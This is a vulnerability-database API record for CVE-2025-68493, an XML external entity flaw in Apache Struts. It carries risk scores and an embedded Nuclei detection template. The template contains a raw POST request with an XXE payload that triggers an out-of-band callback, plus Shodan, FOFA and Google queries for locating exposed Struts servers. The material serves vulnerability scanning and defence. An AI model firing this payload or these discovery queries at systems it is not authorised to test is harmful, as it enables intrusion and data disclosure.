{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-68493/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-68493/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-68493/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-68493/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-68493/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-68493"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-68493"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.4334,
      "kev": false,
      "percentile": 0.98673
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-68493.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2025-68493\n\ninfo:\n  name: Apache Struts XWork - XML External Entity Injection\n  author: pussycat0x\n  severity: high\n  description: |\n    Apache Struts 2.0.0 < 2.2.1 and 2.2.1 <= versions <= 6.1.0 contain an XML external entity injection caused by missing XML validation, letting attackers potentially disclose files or cause denial of service, exploit requires crafted XML input\n  impact: |\n    Attackers can disclose sensitive files or cause denial of service by exploiting XML processing.\n  remediation: |\n    Upgrade to version 6.1.1.\n  reference:\n    - https://cwiki.apache.org/confluence/display/WW/S2-069\n    - https://github.com/hsltz/CVE-2025-68493\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\n    cvss-score: 8.1\n    cve-id: CVE-2025-68493\n    cwe-id: CWE-611\n    epss-score: 0.4334\n    epss-percentile: 0.98673\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: apache\n    product: struts\n    shodan-query:\n      - http.html:\"Apache Struts\"\n      - http.html:\"struts problem report\"\n      - http.title:\"Struts2 Showcase\"\n    fofa-query:\n      - body=\"struts problem report\"\n      - app=\"apache_struts\"\n      - title=\"Struts2 Showcase\"\n    google-query: intitle:\"struts2 showcase\"\n  tags: cve,cve2025,apache,struts,struts2,xxe,oast,oob,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'Struts'\n        case-insensitive: true\n        internal: true\n\n  - raw:\n      - |\n        POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\n        Connection: close\n\n        <?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">]><foo>&xxe;</foo>\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n          - \"http\"\n        condition: or\n# digest: 4a0a0047304502206d8ef8c78b4947b93f81280ef3c0ab63aa54debba82f7f759be53d67e9affb650221009a4377579470ffedb33a9cab95ac98ceeb5a1beee8304234c7905eaca99a96f3:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-68493"
}